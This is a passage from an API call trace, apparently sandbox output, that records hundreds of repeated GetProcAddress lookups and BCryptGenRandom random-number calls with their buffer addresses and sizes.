hAlgorithm=0x0, pbBuffer=0x4d5391, cbBuffer=0x27, dwFlags=0x2 | out: pbBuffer=0x4d5391) returned 0x0 [0153.883] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0153.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0153.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0153.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0153.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0153.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0153.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0153.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0153.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0153.890] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.890] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0153.890] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0153.891] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.891] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.891] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.891] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.892] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0153.892] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.893] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.893] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0153.893] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.893] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0153.894] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.894] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d53b8, cbBuffer=0x23, dwFlags=0x2 | out: pbBuffer=0x4d53b8) returned 0x0 [0153.894] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.895] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0153.895] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.895] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.895] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.895] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0153.895] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.895] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.896] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.896] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.896] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.896] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.896] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.896] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0153.896] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.896] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.897] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.897] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.897] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0153.897] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.898] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.898] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0153.898] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.898] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0153.899] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.899] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.899] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.899] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0153.899] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.899] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0153.899] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.900] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.900] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.900] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.900] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.900] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0153.900] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.900] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.901] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0153.901] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0153.901] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.901] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0153.902] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.902] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.902] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.902] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0153.902] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d53db, cbBuffer=0x17, dwFlags=0x2 | out: pbBuffer=0x4d53db) returned 0x0 [0153.903] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.903] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0153.903] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.904] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0153.904] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.904] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.904] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0153.905] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.905] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0153.905] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.905] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0153.905] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.905] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.905] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.905] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.906] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.906] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0153.906] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.906] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.906] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.906] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0153.906] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.906] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.906] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.906] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.907] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.907] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.907] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.907] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.907] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.907] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0153.907] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.907] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d53f2, cbBuffer=0x25, dwFlags=0x2 | out: pbBuffer=0x4d53f2) returned 0x0 [0153.908] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.908] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.908] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.908] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.908] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0153.909] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.909] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.909] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.909] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.909] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.909] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0153.909] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.910] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0153.910] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.910] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0153.910] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0153.910] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0153.910] GetProcAddress 